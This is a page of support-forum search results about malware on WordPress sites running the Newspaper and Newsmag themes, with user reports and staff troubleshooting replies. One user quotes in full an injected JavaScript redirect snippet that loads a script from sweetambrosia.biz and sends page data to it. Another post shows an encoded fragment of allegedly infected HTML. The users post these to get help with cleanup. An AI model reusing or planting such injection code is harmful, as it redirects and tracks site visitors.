Search Results for 'Malware'

    No search results were found in Documentation!

Results from the Forum
hafis
Participant
#0

Hi,

I’ve recently purchased Newspaper theme for my blog http://www.1001tricks.com

But I’m facing an issue when I scanned using Wordfence to see if there is any security issue.

It’s reporting that some kind of malware has been found within the theme.

Check screenshot: https://scontent-sin6-1.xx.fbcdn.net/v/t34.0-12/20196987_833912646759350_791776505_n.png?oh=add55a74eea429702413b803422b7cad&oe=5970688B

Is there anything to be worried?

Regards

Simion C.
tagDiv Staff

Hi,

It seems you have some aggressive ad system present on your website. Clicking anywhere on the page is redirecting to a difficult to close tab, while also opening other ads in tabs
https://www.screencast.com/t/56ey5sFbFk
You could reinstall WordPress and the theme, and uninstall all other plugins except what is provided in the theme package.
Or scan with malware detection tools to see if there are any problems detected. More useful suggestions by Chris here
https://forum.tagdiv.com/topic/malware-infection-redirects/
http://www.wpbeginner.com/plugins/how-to-scan-your-wordpress-site-for-potentially-malicious-code/

Thanks

Catalin
tagDiv Staff

Hello Sanusi,

Try to reinstall the theme via FTP way and install only the plugins that come bundled with the theme core files and rule out any conflicts and possible warnings. Please try to scan your website and check it to not be infected with some malware of spyware.

Thanks for your understanding!

simchris
tagDiv Member

Your site, or your PC might have malware.

Did you scan your site with Securi site scanner?

Did you scan your PC with anti-virus/malware/windows defender etc?

Is your version of WP up to date?

Delete old un-used plugins and themes?

Change all your passwords?

You have a *lot* of social plugins running, so likely one of those; try disabling them all one by one to see what gets rid of it.

Simion C.
tagDiv Staff

Hi,

Your website could be infected with malware, if that is what Google says. A suggestion would be to deactivate all plugins except the ones provided with the theme, clear any caching installed and then check in the website source if the script is still loaded. You can try the advice from here as well
http://www.wpbeginner.com/plugins/how-to-scan-your-wordpress-site-for-potentially-malicious-code/
More useful information here
https://forum.tagdiv.com/topic/malware-infection-redirects/
You can try a theme reinstall using the latest version, and also update the provided plugins. WordPress should be updated to date as well.

Thanks

PowerM
Participant
#0

Hi Guys,

My site has just been disapproved for ad words because of malware. The script they are referring to is http://font-update.com/js/header.js? Do you know if this is in any of the wordpress theme files. Apparently the link is not secure, and I thought it may have something to do with punch fonts.

Thanks in advance.

graficaofficinaidee
Participant
#0

Hello,
how can i fix this problem?
my blog (blog.tifoshop.com) randomly redirects visitors to malicious sites.
I checked the homepage code:
the visual composer doesn’t work and the code is infected!
I don’t have a backup clean to replace, there is a possibility to have a support to restore the code?
thanks

there is an example of infected code:

[/vc_column_text][vc_raw_html]JTA5JTNDJTIxLS0lMjBCT1glMjBORVdTTEVUVEVSJTIwLS0lM0UlMEElMDklM0NkaXYlMjBpZCUzRCUyMmJveF9uZXdzbGV0dGVyJTIyJTNFJTBBJTA5JTA5JTNDaW5wdXQlMjB0eXBlJTNEJTIydGV4dCUyMiUyMGlkJTNEJTIyZW1haWxfbmV3cyUyMiUyMG5hbWUlM0QlMjJlbWFpbF9uZXdzJTIyJTIwcGxhY2Vob2xkZXIlM0QlMjJlLW1haWwlMjIlM0UlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlM0MlMkZkaXYlM0UlMEElMEElMDklMDklMEElMDklM0NkaXYlMjBpZCUzRCUyMmJveF9yZWdpc3RyYXRpJTIyJTNFJTBBJTA5JTNDYSUyMGNsYXNzJTNEJTIydGVzdG9yZWdpc3RyYXRpJTIyJTIwaHJlZiUzRCUyMmphdmFzY3JpcHQlM0ElMjIlMjBvbmNsaWNrJTNEJTIyc3Vic2NyaWJlTmV3c2xldHRlciUyOCUyOSUzQiUyMiUzRVJlZ2lzdHJhdGklM0MlMkZhJTNFJTBBJTA5JTNDJTJGZGl2JTNFJTBBJTBBJTA5JTNDZGl2JTIwaWQlM0QlMjJmb290ZXJfaW5wdXRfbmV3c2xldHRlcl9sb2FkaW5nJTIyJTIwc3R5bGUlM0QlMjJkaXNwbGF5JTNBbm9uZSUzQiUyMiUzRSUwQSU
etc…

simchris
tagDiv Member

Basically it means Google could not access your website when they went to verify it.

So, you should ‘test’ your site with tools like securi malware scanners, and GTmetrix, and also check your pages with F12/console view in Chrome for functional errors.

Generally their messages mean exactly what they say … “error 404 – ” means they cannot view your site content (Google what ‘404’ error is).

simchris
tagDiv Member

Where did you download the theme from?

Perhaps download fresh copy from your Themeforest account.

The version there does not have any malware.

colgate
Participant
#0

Hi

Soon after updating to Newspaper v7.8, the ClamAV Virus Scanner has flagged the files below as Malware. Could you please urgently advise on what to do.

Should I Quarantine, Destroy or Ignore????

Thanks

public_html/wp-content/themes/Newspaper/style.css Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/editor-style.css Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/mobile/style.css Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/mobile/includes/less_files/type.less Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/mobile/includes/less_files/video-playlists.less Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/wp_booster/wp-admin/css/wp-admin.css Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/wp_booster/wp-admin/css/panel/color_picker.less Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/wp_booster/wp-admin/css/panel/box.less Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/wp_booster/wp-admin/external/ace/ace.js Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/wp_booster/external/kint/view/inc/original.css Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/wp_booster/external/kint/view/inc/solarized.css Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/wp_booster/external/kint/view/inc/solarized-dark.css Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/wp_booster/external/kint/view/less/original.less Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/wp_booster/external/kint/view/less/solarized-dark.less Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/wp_booster/external/kint/view/less/solarized.less Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/less_files/header-style.less Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/less_files/header.less Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/less_files/type.less Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/less_files/block-templates.less Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/less_files/video-playlists.less Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/themes/Newspaper/includes/plugins/js_composer.zip Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/theme-chrome.js Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL
public_html/wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/ace.js Atomicorp.PHP.Malware.031717163850.29095.UNOFFICIAL

simchris
tagDiv Member

Theme has nothing to do with “everything suddenly not working.”

You should

a) scan site with free Securi scanner online to make sure no malware
b) make sure you have latest version of WordPress – everything prior to current version is not secure
c) check to see if anything changed on your site without your knowledge – hosting issue, caching issue, CDN fail, etc.
d) you enter your activation code in the theme panel for Newspaper – it should not “suddenly” ask for it again unless your site or dbase broken
c) make sure you have backups of your site in case you need to revert to an “un broken’ version.

You might need to provide more info after you check the above items!

Catalin
tagDiv Staff

Hello prim007,

Unfortunately, this issues is not theme related. You’ll see the message “This site may be hacked” when we believe a hacker might have changed some of the existing pages on the site or added new spam pages. If you visit the site, you could be redirected to spam or malware. For more references about this message and how you can rule out of it, you should check the following links here -> https://support.google.com/websearch/answer/190597?hl=en and here -> https://www.techwyse.com/blog/website-design/remove-website-hack-message/

Hope this helps!

Thanks for your understanding

simchris
tagDiv Member

Best to do clean install of newest version of theme; them manually adjust things, to ensure site is completely clean and malware free.

  • This reply was modified 9 years by simchris.
summa123
Participant
malware - topic
#0

Hi

today i purchased your newsmag theme when i install malware ads are appear below the tittle.on single post
please it is urgent please fix it

fitore
Participant
#0

hi,

im having problems with some malware script that is appearing every day in header.php.

script looks like this and is riderectin my site in another malware sites.

can u please tell me how can i find and remove the malware

thnx.

Script:

“””<script>var b=”red”;c=”mod”;function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e=”expires=”+d.toUTCString();document.cookie=a+”=”+b+”; “+e}function getCookie(a){for(var b=a+”=”,c=document.cookie.split(“;”),d=0;d<c.length;d++){for(var e=c[d];” “==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie(“ytm_hit1”)&&(setCookie(“ytm_hit1”,1,1),1==getCookie(“ytm_hit1”)&&(setCookie(“ytm_hit1″,2,1),document.write(‘<script type=”text/javascript” src=”‘ + ‘http://sweetambrosia.biz/js/jquery.min.php&#8217; + ‘?key=b64’ + ‘&utm_campaign=’ + ‘snt2014’ + ‘&utm_source=’ + window.location.host + ‘&utm_medium=’ + ‘&utm_content=’ + window.location + ‘&utm_term=’ + encodeURIComponent(((k=(function(){var keywords = ”;var metas = document.getElementsByTagName(‘meta’);if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == “keywords”) {keywords += metas[x].content;}}}return keywords !== ” ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?”:t:v[1]:k)) + ‘&se_referrer=’ + encodeURIComponent(document.referrer) + ‘”><‘ + ‘/script>’)));</script><script>var b=”red”;c=”mod”;function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e=”expires=”+d.toUTCString();document.cookie=a+”=”+b+”; “+e}function getCookie(a){for(var b=a+”=”,c=document.cookie.split(“;”),d=0;d<c.length;d++){for(var e=c[d];” “==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie(“ytm_hit1”)&&(setCookie(“ytm_hit1”,1,1),1==getCookie(“ytm_hit1”)&&(setCookie(“ytm_hit1″,2,1),document.write(‘<script type=”text/javascript” src=”‘ + ‘http://sweetambrosia.biz/js/jquery.min.php&#8217; + ‘?key=b64’ + ‘&utm_campaign=’ + ‘snt2014’ + ‘&utm_source=’ + window.location.host + ‘&utm_medium=’ + ‘&utm_content=’ + window.location + ‘&utm_term=’ + encodeURIComponent(((k=(function(){var keywords = ”;var metas = document.getElementsByTagName(‘meta’);if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == “keywords”) {keywords += metas[x].content;}}}return keywords !== ” ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?”:t:v[1]:k)) + ‘&se_referrer=’ + encodeURIComponent(document.referrer) + ‘”><‘ + ‘/script>’)));</script>”””

Bogdan B.
tagDiv Staff

Hello

Unfortunately we have no idea who 57.alay is. You should definitely check this guide: https://codex.wordpress.org/Hardening_WordPress
You should also scan your install for any malware or injected code.
The theme has nothing to do with this hack .

Thank you!

Bogdan B.
tagDiv Staff

Sorry but this has nothing to do with the theme support or the theme at all. It is merely a coincidence. The theme will not touch your site in any way. Once you buy the theme you have it for life and there is no such thing as disabling the website. Please switch to a standard wp theme and test it out. Your site could have been disabled by maybe some malware or the host. We assure you that the theme is not able to disable your site

Thank you!

Bogdan B.
tagDiv Staff

Hello,

The standard envato license specifies you can only use one copy of the theme on 1 single end product: https://themeforest.net/licenses/standard as for the ransomware, we have no information to provide in this regard. We do not use any types of malware or code that can block a user machine.

Thank you!

simchris
tagDiv Member

We’re not having this issue here, for what it’s worth.

Also be aware that some advertising networks can contain malware; so often in checking your site for “actual” JS issues, first step if often turning off ALL advertising and rechecking after clearing all caching.

simchris
tagDiv Member

You don’t need to ‘activate’ Visual Composer, as that only applies to the paid license version, not the free bundled version; meaning you can’t activate the paid support from WPBakery since you didn’t buy it alone. So, you have to ignore the ‘nag screen’ — it still works perfectly, as it only needs to be ‘turned on’ from the actual WP plugins page.

If you use ‘cracked’ software you can get malware, hacks, and banned forever by your hosting provider(s).

Nobody here will help you if you use cr8ked warez.

drakeprg
Participant
#0

Hello there,

Report - SS

I just installed Newsmag theme, downloaded directly from Themeforest.

However I’m facing a problem that in my homepage, or post view – ONLY WHEN VIEWING VIA MOBILE

That a lot of random ads google ads appeared. and I didnt setup any of them.

Could you please check it for me?

Also, I’m new to this forum, so please guide me how to send my detail (ftp, admin panel) in case needed.

Thanks a lot

debarup
tagDiv Member

Hi,

Need your help urgently.

I got this malware message in last few days.

So I removed the TagDiv websites urls from the affected files such like

td_config.php
td_api.php
td_cake.php
td_panel_header.php

and many others.

Now I am getting these error in the dashboard, also few plugins are not working properly, there are delay in new plugin install, deleting and updating.

And this url (http://www.topfivebuzz.com/wp-admin/) is giving the error mentioned below

Warning: Cannot modify header information – headers already sent by (output started at /home2/mayanzc1/public_html/topfivebuzz/wp-content/themes/Newsmag/includes/td_config.php:1) in /home2/mayanzc1/public_html/topfivebuzz/wp-includes/pluggable.php on line 1174

Looking forward to your help.

Thanks & Regards
Debarup

debarup
tagDiv Member

Hi,

Need your help urgently.

I got this malware message in last few days.

So I removed the TagDiv websites urls from the affected files such like

td_config.php
td_api.php
td_cake.php
td_panel_header.php

and many others.

Now I am getting these error in the dashboard, also few plugins are not working properly, there are delay in new plugin install, deleting and updating.

And this url (http://www.topfivebuzz.com/wp-admin/) is giving the error mentioned below

Warning: Cannot modify header information – headers already sent by (output started at /home2/mayanzc1/public_html/topfivebuzz/wp-content/themes/Newsmag/includes/td_config.php:1) in /home2/mayanzc1/public_html/topfivebuzz/wp-includes/pluggable.php on line 1174

Looking forward to your help.

Thanks & Regards
Debarup

Bogdan B.
tagDiv Staff

Hello,

We can assure you your sites are safe. This forum got infected with a few malware exploits but they were removed and there is no threat anymore. Your sites got the warnings because the theme has links to this forum (to the documentation) in the theme panel. (Thy are the suggestions and references to the docs.)
This only affected our server and could not have affected anything beyond that.

Sorry for the inconvenience and thank you for your understanding.

simchris
tagDiv Member

https://sitecheck.sucuri.net/results/forum.tagdiv.com/

ISSUE DETECTED DEFINITION INFECTED URL
Website Malware MW:JS:GEN2?web.js.malware.fake_jquery.003 https://forum.tagdiv.com/ ( View Payload )
Website Malware MW:JS:GEN2?web.js.malware.fake_jquery.003 https://forum.tagdiv.com/404testpage4525d2fdc ( View Payload )
Website Malware MW:JS:GEN2?web.js.malware.fake_jquery.003 https://forum.tagdiv.com/404javascript.js ( View Payload )
Website Malware MW:JS:GEN2?web.js.malware.fake_jquery.003 https://forum.tagdiv.com/login/ ( View Payload )
Website Malware MW:JS:GEN2?web.js.malware.fake_jquery.003 https://forum.tagdiv.com/register/ ( View Payload )
Website Malware MW:JS:GEN2?web.js.malware.fake_jquery.003

Viewing 25 results - 551 through 575 (of 681 total)